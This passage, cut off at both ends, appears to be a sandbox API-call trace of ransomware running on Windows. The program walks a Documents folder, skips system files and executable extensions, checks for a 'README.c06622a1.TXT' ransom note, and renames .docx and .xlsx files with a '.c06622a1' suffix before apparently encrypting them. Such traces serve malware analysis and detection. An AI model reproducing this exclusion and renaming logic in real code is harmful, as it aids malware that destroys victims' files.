(_String="boot.ini") returned 0x8 [0157.377] _wcsicmp (_Str1="bootfont.bin", _Str2="4CYSV.docx") returned 46 [0157.377] wcslen (_String="bootfont.bin") returned 0xc [0157.377] _wcsicmp (_Str1="bootsect.bak", _Str2="4CYSV.docx") returned 46 [0157.377] wcslen (_String="bootsect.bak") returned 0xc [0157.377] _wcsicmp (_Str1="desktop.ini", _Str2="4CYSV.docx") returned 48 [0157.377] wcslen (_String="desktop.ini") returned 0xb [0157.377] _wcsicmp (_Str1="iconcache.db", _Str2="4CYSV.docx") returned 53 [0157.377] wcslen (_String="iconcache.db") returned 0xc [0157.377] _wcsicmp (_Str1="ntldr", _Str2="4CYSV.docx") returned 58 [0157.377] wcslen (_String="ntldr") returned 0x5 [0157.377] _wcsicmp (_Str1="ntuser.dat", _Str2="4CYSV.docx") returned 58 [0157.377] wcslen (_String="ntuser.dat") returned 0xa [0157.377] _wcsicmp (_Str1="ntuser.dat.log", _Str2="4CYSV.docx") returned 58 [0157.377] wcslen (_String="ntuser.dat.log") returned 0xe [0157.377] _wcsicmp (_Str1="ntuser.ini", _Str2="4CYSV.docx") returned 58 [0157.377] wcslen (_String="ntuser.ini") returned 0xa [0157.377] _wcsicmp (_Str1="thumbs.db", _Str2="4CYSV.docx") returned 64 [0157.377] wcslen (_String="thumbs.db") returned 0x9 [0157.378] _wcsicmp (_Str1="386", _Str2="docx") returned -49 [0157.378] wcslen (_String="386") returned 0x3 [0157.378] _wcsicmp (_Str1="adv", _Str2="docx") returned -3 [0157.378] wcslen (_String="adv") returned 0x3 [0157.378] _wcsicmp (_Str1="ani", _Str2="docx") returned -3 [0157.378] wcslen (_String="ani") returned 0x3 [0157.378] _wcsicmp (_Str1="bat", _Str2="docx") returned -2 [0157.378] wcslen (_String="bat") returned 0x3 [0157.378] _wcsicmp (_Str1="bin", _Str2="docx") returned -2 [0157.378] wcslen (_String="bin") returned 0x3 [0157.378] _wcsicmp (_Str1="cab", _Str2="docx") returned -1 [0157.378] wcslen (_String="cab") returned 0x3 [0157.378] _wcsicmp (_Str1="cmd", _Str2="docx") returned -1 [0157.378] wcslen (_String="cmd") returned 0x3 [0157.378] _wcsicmp (_Str1="com", _Str2="docx") returned -1 [0157.378] wcslen (_String="com") returned 0x3 [0157.378] _wcsicmp (_Str1="cpl", _Str2="docx") returned -1 [0157.378] wcslen (_String="cpl") returned 0x3 [0157.378] _wcsicmp (_Str1="cur", _Str2="docx") returned -1 [0157.378] wcslen (_String="cur") returned 0x3 [0157.378] _wcsicmp (_Str1="deskthemepack", _Str2="docx") returned -10 [0157.378] wcslen (_String="deskthemepack") returned 0xd [0157.378] _wcsicmp (_Str1="diagcab", _Str2="docx") returned -6 [0157.378] wcslen (_String="diagcab") returned 0x7 [0157.378] _wcsicmp (_Str1="diagcfg", _Str2="docx") returned -6 [0157.378] wcslen (_String="diagcfg") returned 0x7 [0157.378] _wcsicmp (_Str1="diagpkg", _Str2="docx") returned -6 [0157.378] wcslen (_String="diagpkg") returned 0x7 [0157.378] _wcsicmp (_Str1="dll", _Str2="docx") returned -3 [0157.379] wcslen (_String="dll") returned 0x3 [0157.379] _wcsicmp (_Str1="drv", _Str2="docx") returned 3 [0157.379] wcslen (_String="drv") returned 0x3 [0157.379] _wcsicmp (_Str1="exe", _Str2="docx") returned 1 [0157.379] wcslen (_String="exe") returned 0x3 [0157.379] _wcsicmp (_Str1="hlp", _Str2="docx") returned 4 [0157.379] wcslen (_String="hlp") returned 0x3 [0157.379] _wcsicmp (_Str1="icl", _Str2="docx") returned 5 [0157.379] wcslen (_String="icl") returned 0x3 [0157.379] _wcsicmp (_Str1="icns", _Str2="docx") returned 5 [0157.379] wcslen (_String="icns") returned 0x4 [0157.379] _wcsicmp (_Str1="ico", _Str2="docx") returned 5 [0157.379] wcslen (_String="ico") returned 0x3 [0157.379] _wcsicmp (_Str1="ics", _Str2="docx") returned 5 [0157.379] wcslen (_String="ics") returned 0x3 [0157.379] _wcsicmp (_Str1="idx", _Str2="docx") returned 5 [0157.379] wcslen (_String="idx") returned 0x3 [0157.379] _wcsicmp (_Str1="ldf", _Str2="docx") returned 8 [0157.379] wcslen (_String="ldf") returned 0x3 [0157.379] _wcsicmp (_Str1="lnk", _Str2="docx") returned 8 [0157.379] wcslen (_String="lnk") returned 0x3 [0157.379] _wcsicmp (_Str1="mod", _Str2="docx") returned 9 [0157.379] wcslen (_String="mod") returned 0x3 [0157.380] _wcsicmp (_Str1="mpa", _Str2="docx") returned 9 [0157.380] wcslen (_String="mpa") returned 0x3 [0157.380] _wcsicmp (_Str1="msc", _Str2="docx") returned 9 [0157.380] wcslen (_String="msc") returned 0x3 [0157.380] _wcsicmp (_Str1="msp", _Str2="docx") returned 9 [0157.380] wcslen (_String="msp") returned 0x3 [0157.380] _wcsicmp (_Str1="msstyles", _Str2="docx") returned 9 [0157.380] wcslen (_String="msstyles") returned 0x8 [0157.380] _wcsicmp (_Str1="msu", _Str2="docx") returned 9 [0157.380] wcslen (_String="msu") returned 0x3 [0157.380] _wcsicmp (_Str1="nls", _Str2="docx") returned 10 [0157.380] wcslen (_String="nls") returned 0x3 [0157.380] _wcsicmp (_Str1="nomedia", _Str2="docx") returned 10 [0157.380] wcslen (_String="nomedia") returned 0x7 [0157.380] _wcsicmp (_Str1="ocx", _Str2="docx") returned 11 [0157.380] wcslen (_String="ocx") returned 0x3 [0157.380] _wcsicmp (_Str1="prf", _Str2="docx") returned 12 [0157.380] wcslen (_String="prf") returned 0x3 [0157.380] _wcsicmp (_Str1="ps1", _Str2="docx") returned 12 [0157.380] wcslen (_String="ps1") returned 0x3 [0157.380] _wcsicmp (_Str1="rom", _Str2="docx") returned 14 [0157.380] wcslen (_String="rom") returned 0x3 [0157.380] _wcsicmp (_Str1="rtp", _Str2="docx") returned 14 [0157.380] wcslen (_String="rtp") returned 0x3 [0157.380] _wcsicmp (_Str1="scr", _Str2="docx") returned 15 [0157.380] wcslen (_String="scr") returned 0x3 [0157.381] _wcsicmp (_Str1="shs", _Str2="docx") returned 15 [0157.381] wcslen (_String="shs") returned 0x3 [0157.381] _wcsicmp (_Str1="spl", _Str2="docx") returned 15 [0157.381] wcslen (_String="spl") returned 0x3 [0157.381] _wcsicmp (_Str1="sys", _Str2="docx") returned 15 [0157.381] wcslen (_String="sys") returned 0x3 [0157.381] _wcsicmp (_Str1="theme", _Str2="docx") returned 16 [0157.381] wcslen (_String="theme") returned 0x5 [0157.381] _wcsicmp (_Str1="themepack", _Str2="docx") returned 16 [0157.381] wcslen (_String="themepack") returned 0x9 [0157.381] _wcsicmp (_Str1="wpx", _Str2="docx") returned 19 [0157.381] wcslen (_String="wpx") returned 0x3 [0157.381] _wcsicmp (_Str1="lock", _Str2="docx") returned 8 [0157.381] wcslen (_String="lock") returned 0x4 [0157.381] _wcsicmp (_Str1="key", _Str2="docx") returned 7 [0157.381] wcslen (_String="key") returned 0x3 [0157.381] _wcsicmp (_Str1="hta", _Str2="docx") returned 4 [0157.381] wcslen (_String="hta") returned 0x3 [0157.381] _wcsicmp (_Str1="msi", _Str2="docx") returned 9 [0157.381] wcslen (_String="msi") returned 0x3 [0157.381] _wcsicmp (_Str1="pdb", _Str2="docx") returned 12 [0157.381] wcslen (_String="pdb") returned 0x3 [0157.381] _wcsicmp (_Str1="sqlite", _Str2="docx") returned 15 [0157.381] wcslen (_String="sqlite") returned 0x6 [0157.381] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.381] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.382] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.382] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.382] wcscpy (in: _Dest=0x32100a0, _Source="4CYSV.docx" | out: _Dest="4CYSV.docx") returned="4CYSV.docx" [0157.382] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx", dwFileAttributes=0x80) returned 1 [0157.382] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4cysv.docx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0157.382] SetFilePointerEx (in: hFile=0x1cc, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.382] ReadFile (in: hFile=0x1cc, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.383] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x3af8de89 [0157.383] RtlComputeCrc32 (PartialCrc=0xde89, Buffer=0x32ec24, Length=0x80) returned 0x5f2076a7 [0157.383] RtlComputeCrc32 (PartialCrc=0x76a7, Buffer=0x32ec24, Length=0x80) returned 0x25181cd2 [0157.383] RtlComputeCrc32 (PartialCrc=0x1cd2, Buffer=0x32ec24, Length=0x80) returned 0xb6c7a5ae [0157.383] RtlComputeCrc32 (PartialCrc=0xa5ae, Buffer=0x32ec24, Length=0x80) returned 0x8a12f3ac [0157.383] CloseHandle (hObject=0x1cc) returned 1 [0157.383] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.383] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx" [0157.383] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx") returned 0x36 [0157.383] wcscpy (in: _Dest=0x32200bc, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.383] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4cysv.docx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4cysv.docx.c06622a1"), dwFlags=0x8) returned 1 [0157.396] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\4CYSV.docx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\4cysv.docx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1cc [0157.396] CreateIoCompletionPort (FileHandle=0x1cc, ExistingCompletionPort=0x130, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x130 [0157.396] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2690020 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6d4ef8b7 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1bdb75b9 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5a4bf44b [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x41746c59 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x476e244c [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x5ca816e7 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x37ffc4b3 [0157.403] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2a2a4b38 [0157.406] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2690094, Length=0x80) returned 0xecbcd03f [0157.406] RtlComputeCrc32 (PartialCrc=0xd03f, Buffer=0x2690094, Length=0x80) returned 0xb184322c [0157.406] RtlComputeCrc32 (PartialCrc=0x322c, Buffer=0x2690094, Length=0x80) returned 0xaba10e9a [0157.406] RtlComputeCrc32 (PartialCrc=0xe9a, Buffer=0x2690094, Length=0x80) returned 0x1efb88e9 [0157.406] RtlComputeCrc32 (PartialCrc=0x88e9, Buffer=0x2690094, Length=0x80) returned 0x690d9fbd [0157.407] PostQueuedCompletionStatus (CompletionPort=0x130, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2690020) returned 1 [0157.407] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.408] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.409] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x76cd3860, ftCreationTime.dwHighDateTime=0x1d5b00a, ftLastAccessTime.dwLowDateTime=0xb46ee750, ftLastAccessTime.dwHighDateTime=0x1d578d2, ftLastWriteTime.dwLowDateTime=0xb46ee750, ftLastWriteTime.dwHighDateTime=0x1d578d2, nFileSizeHigh=0x0, nFileSizeLow=0x6ec6, dwReserved0=0x0, dwReserved1=0x0, cFileName="75zCwD6T9WYW.xlsx", cAlternateFileName="75ZCWD~1.XLS")) returned 1 [0157.409] _wcsicmp (_Str1="75zCwD6T9WYW.xlsx", _Str2="README.c06622a1.TXT") returned -59 [0157.409] wcsstr (_Str="75zCwD6T9WYW.xlsx", _SubStr="README") returned 0x0 [0157.409] _wcsicmp (_Str1="autorun.inf", _Str2="75zCwD6T9WYW.xlsx") returned 42 [0157.409] wcslen (_String="autorun.inf") returned 0xb [0157.409] _wcsicmp (_Str1="boot.ini", _Str2="75zCwD6T9WYW.xlsx") returned 43 [0157.409] wcslen (_String="boot.ini") returned 0x8 [0157.409] _wcsicmp (_Str1="bootfont.bin", _Str2="75zCwD6T9WYW.xlsx") returned 43 [0157.409] wcslen (_String="bootfont.bin") returned 0xc [0157.409] _wcsicmp (_Str1="bootsect.bak", _Str2="75zCwD6T9WYW.xlsx") returned 43 [0157.409] wcslen (_String="bootsect.bak") returned 0xc [0157.409] _wcsicmp (_Str1="desktop.ini", _Str2="75zCwD6T9WYW.xlsx") returned 45 [0157.409] wcslen (_String="desktop.ini") returned 0xb [0157.409] _wcsicmp (_Str1="iconcache.db", _Str2="75zCwD6T9WYW.xlsx") returned 50 [0157.409] wcslen (_String="iconcache.db") returned 0xc [0157.409] _wcsicmp (_Str1="ntldr", _Str2="75zCwD6T9WYW.xlsx") returned 55 [0157.409] wcslen (_String="ntldr") returned 0x5 [0157.409] _wcsicmp (_Str1="ntuser.dat", _Str2="75zCwD6T9WYW.xlsx") returned 55 [0157.409] wcslen (_String="ntuser.dat") returned 0xa [0157.409] _wcsicmp (_Str1="ntuser.dat.log", _Str2="75zCwD6T9WYW.xlsx") returned 55 [0157.409] wcslen (_String="ntuser.dat.log") returned 0xe [0157.409] _wcsicmp (_Str1="ntuser.ini", _Str2="75zCwD6T9WYW.xlsx") returned 55 [0157.409] wcslen (_String="ntuser.ini") returned 0xa [0157.409] _wcsicmp (_Str1="thumbs.db", _Str2="75zCwD6T9WYW.xlsx") returned 61 [0157.409] wcslen (_String="thumbs.db") returned 0x9 [0157.409] _wcsicmp (_Str1="386", _Str2="xlsx") returned -69 [0157.409] wcslen (_String="386") returned 0x3 [0157.409] _wcsicmp (_Str1="adv", _Str2="xlsx") returned -23 [0157.409] wcslen (_String="adv") returned 0x3 [0157.409] _wcsicmp (_Str1="ani", _Str2="xlsx") returned -23 [0157.410] wcslen (_String="ani") returned 0x3 [0157.410] _wcsicmp (_Str1="bat", _Str2="xlsx") returned -22 [0157.410] wcslen (_String="bat") returned 0x3 [0157.410] _wcsicmp (_Str1="bin", _Str2="xlsx") returned -22 [0157.410] wcslen (_String="bin") returned 0x3 [0157.410] _wcsicmp (_Str1="cab", _Str2="xlsx") returned -21 [0157.410] wcslen (_String="cab") returned 0x3 [0157.410] _wcsicmp (_Str1="cmd", _Str2="xlsx") returned -21 [0157.410] wcslen (_String="cmd") returned 0x3 [0157.410] _wcsicmp (_Str1="com", _Str2="xlsx") returned -21 [0157.410] wcslen (_String="com") returned 0x3 [0157.410] _wcsicmp (_Str1="cpl", _Str2="xlsx") returned -21 [0157.410] wcslen (_String="cpl") returned 0x3 [0157.410] _wcsicmp (_Str1="cur", _Str2="xlsx") returned -21 [0157.410] wcslen (_String="cur") returned 0x3 [0157.410] _wcsicmp (_Str1="deskthemepack", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="deskthemepack") returned 0xd [0157.410] _wcsicmp (_Str1="diagcab", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="diagcab") returned 0x7 [0157.410] _wcsicmp (_Str1="diagcfg", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="diagcfg") returned 0x7 [0157.410] _wcsicmp (_Str1="diagpkg", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="diagpkg") returned 0x7 [0157.410] _wcsicmp (_Str1="dll", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="dll") returned 0x3 [0157.410] _wcsicmp (_Str1="drv", _Str2="xlsx") returned -20 [0157.410] wcslen (_String="drv") returned 0x3 [0157.410] _wcsicmp (_Str1="exe", _Str2="xlsx") returned -19 [0157.410] wcslen (_String="exe") returned 0x3 [0157.410] _wcsicmp (_Str1="hlp", _Str2="xlsx") returned -16 [0157.410] wcslen (_String="hlp") returned 0x3 [0157.410] _wcsicmp (_Str1="icl", _Str2="xlsx") returned -15 [0157.410] wcslen (_String="icl") returned 0x3 [0157.410] _wcsicmp (_Str1="icns", _Str2="xlsx") returned -15 [0157.410] wcslen (_String="icns") returned 0x4 [0157.410] _wcsicmp (_Str1="ico", _Str2="xlsx") returned -15 [0157.411] wcslen (_String="ico") returned 0x3 [0157.411] _wcsicmp (_Str1="ics", _Str2="xlsx") returned -15 [0157.411] wcslen (_String="ics") returned 0x3 [0157.411] _wcsicmp (_Str1="idx", _Str2="xlsx") returned -15 [0157.411] wcslen (_String="idx") returned 0x3 [0157.411] _wcsicmp (_Str1="ldf", _Str2="xlsx") returned -12 [0157.411] wcslen (_String="ldf") returned 0x3 [0157.411] _wcsicmp (_Str1="lnk", _Str2="xlsx") returned -12 [0157.411] wcslen (_String="lnk") returned 0x3 [0157.411] _wcsicmp (_Str1="mod", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="mod") returned 0x3 [0157.411] _wcsicmp (_Str1="mpa", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="mpa") returned 0x3 [0157.411] _wcsicmp (_Str1="msc", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="msc") returned 0x3 [0157.411] _wcsicmp (_Str1="msp", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="msp") returned 0x3 [0157.411] _wcsicmp (_Str1="msstyles", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="msstyles") returned 0x8 [0157.411] _wcsicmp (_Str1="msu", _Str2="xlsx") returned -11 [0157.411] wcslen (_String="msu") returned 0x3 [0157.411] _wcsicmp (_Str1="nls", _Str2="xlsx") returned -10 [0157.411] wcslen (_String="nls") returned 0x3 [0157.411] _wcsicmp (_Str1="nomedia", _Str2="xlsx") returned -10 [0157.411] wcslen (_String="nomedia") returned 0x7 [0157.411] _wcsicmp (_Str1="ocx", _Str2="xlsx") returned -9 [0157.411] wcslen (_String="ocx") returned 0x3 [0157.411] _wcsicmp (_Str1="prf", _Str2="xlsx") returned -8 [0157.411] wcslen (_String="prf") returned 0x3 [0157.411] _wcsicmp (_Str1="ps1", _Str2="xlsx") returned -8 [0157.411] wcslen (_String="ps1") returned 0x3 [0157.411] _wcsicmp (_Str1="rom", _Str2="xlsx") returned -6 [0157.411] wcslen (_String="rom") returned 0x3 [0157.411] _wcsicmp (_Str1="rtp", _Str2="xlsx") returned -6 [0157.411] wcslen (_String="rtp") returned 0x3 [0157.411] _wcsicmp (_Str1="scr", _Str2="xlsx") returned -5 [0157.412] wcslen (_String="scr") returned 0x3 [0157.412] _wcsicmp (_Str1="shs", _Str2="xlsx") returned -5 [0157.412] wcslen (_String="shs") returned 0x3 [0157.412] _wcsicmp (_Str1="spl", _Str2="xlsx") returned -5 [0157.412] wcslen (_String="spl") returned 0x3 [0157.412] _wcsicmp (_Str1="sys", _Str2="xlsx") returned -5 [0157.412] wcslen (_String="sys") returned 0x3 [0157.412] _wcsicmp (_Str1="theme", _Str2="xlsx") returned -4 [0157.412] wcslen (_String="theme") returned 0x5 [0157.412] _wcsicmp (_Str1="themepack", _Str2="xlsx") returned -4 [0157.412] wcslen (_String="themepack") returned 0x9 [0157.412] _wcsicmp (_Str1="wpx", _Str2="xlsx") returned -1 [0157.412] wcslen (_String="wpx") returned 0x3 [0157.412] _wcsicmp (_Str1="lock", _Str2="xlsx") returned -12 [0157.412] wcslen (_String="lock") returned 0x4 [0157.412] _wcsicmp (_Str1="key", _Str2="xlsx") returned -13 [0157.412] wcslen (_String="key") returned 0x3 [0157.412] _wcsicmp (_Str1="hta", _Str2="xlsx") returned -16 [0157.412] wcslen (_String="hta") returned 0x3 [0157.412] _wcsicmp (_Str1="msi", _Str2="xlsx") returned -11 [0157.412] wcslen (_String="msi") returned 0x3 [0157.412] _wcsicmp (_Str1="pdb", _Str2="xlsx") returned -8 [0157.412] wcslen (_String="pdb") returned 0x3 [0157.412] _wcsicmp (_Str1="sqlite", _Str2="xlsx") returned -5 [0157.412] wcslen (_String="sqlite") returned 0x6 [0157.412] GetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents")) returned 0x11 [0157.412] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3210048 [0157.412] wcscpy (in: _Dest=0x3210048, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents" [0157.413] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x2b [0157.413] wcscpy (in: _Dest=0x32100a0, _Source="75zCwD6T9WYW.xlsx" | out: _Dest="75zCwD6T9WYW.xlsx") returned="75zCwD6T9WYW.xlsx" [0157.413] SetFileAttributesW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx", dwFileAttributes=0x80) returned 1 [0157.413] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\75zcwd6t9wyw.xlsx"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0157.413] SetFilePointerEx (in: hFile=0x1a4, liDistanceToMove=0xffffff70, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0157.413] ReadFile (in: hFile=0x1a4, lpBuffer=0x32ec24, nNumberOfBytesToRead=0x90, lpNumberOfBytesRead=0x32ecb4, lpOverlapped=0x0 | out: lpBuffer=0x32ec24*, lpNumberOfBytesRead=0x32ecb4*=0x90, lpOverlapped=0x0) returned 1 [0157.414] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x32ec24, Length=0x80) returned 0x1c20758b [0157.414] RtlComputeCrc32 (PartialCrc=0x758b, Buffer=0x32ec24, Length=0x80) returned 0xaf2d5331 [0157.414] RtlComputeCrc32 (PartialCrc=0x5331, Buffer=0x32ec24, Length=0x80) returned 0x6f0e8f23 [0157.414] RtlComputeCrc32 (PartialCrc=0x8f23, Buffer=0x32ec24, Length=0x80) returned 0xae976403 [0157.414] RtlComputeCrc32 (PartialCrc=0x6403, Buffer=0x32ec24, Length=0x80) returned 0xce7a145 [0157.414] CloseHandle (hObject=0x1a4) returned 1 [0157.414] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x10000) returned 0x3220050 [0157.414] wcscpy (in: _Dest=0x3220050, _Source="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx" | out: _Dest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx" [0157.414] wcslen (_String="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx") returned 0x3d [0157.414] wcscpy (in: _Dest=0x32200ca, _Source=".c06622a1" | out: _Dest=".c06622a1") returned=".c06622a1" [0157.414] MoveFileExW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\75zcwd6t9wyw.xlsx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\75zcwd6t9wyw.xlsx.c06622a1"), dwFlags=0x8) returned 1 [0157.416] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\75zCwD6T9WYW.xlsx.c06622a1" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\75zcwd6t9wyw.xlsx.c06622a1"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x48000000, hTemplateFile=0x0) returned 0x1a4 [0157.416] CreateIoCompletionPort (FileHandle=0x1a4, ExistingCompletionPort=0xd8, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0xd8 [0157.416] RtlAllocateHeap (HeapHandle=0x130000, Flags=0x0, Size=0x80104) returned 0x2b70020 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x55e02290 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x6ed0f547 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x17c6da68 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x4fcd410e [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x1fe147a2 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x66002fe8 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x7e274dd6 [0157.423] RtlRandomEx (in: Seed=0xcb1018 | out: Seed=0xcb1018) returned 0x2fabc315 [0157.426] RtlComputeCrc32 (PartialCrc=0xbeef, Buffer=0x2b70094, Length=0x80) returned 0x21f77c67 [0157.426] RtlComputeCrc32 (PartialCrc=0x7c67, Buffer=0x2b70094, Length=0x80) returned 0x7da295fd [0157.426] RtlComputeCrc32 (PartialCrc=0x95fd, Buffer=0x2b70094, Length=0x80) returned 0x2616b43 [0157.426] RtlComputeCrc32 (PartialCrc=0x6b43, Buffer=0x2b70094, Length=0x80) returned 0x29cc0eb1 [0157.426] RtlComputeCrc32 (PartialCrc=0xeb1, Buffer=0x2b70094, Length=0x80) returned 0x531dd00e [0157.427] PostQueuedCompletionStatus (CompletionPort=0xd8, dwNumberOfBytesTransferred=0x0, dwCompletionKey=0x0, lpOverlapped=0x2b70020) returned 1 [0157.427] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3210048) returned 1 [0157.428] RtlFreeHeap (HeapHandle=0x130000, Flags=0x0, BaseAddress=0x3220050) returned 1 [0157.428] FindNextFileW (in: hFindFile=0x154148, lpFindFileData=0x32ed9c | out: lpFindFileData=0x32ed9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f9c8f90, ftCreationTime.dwHighDateTime=0x1d5de7d, ftLastAccessTime.dwLowDateTime=0x74283970, ftLastAccessTime.dwHighDateTime=0x1d5e5a7, 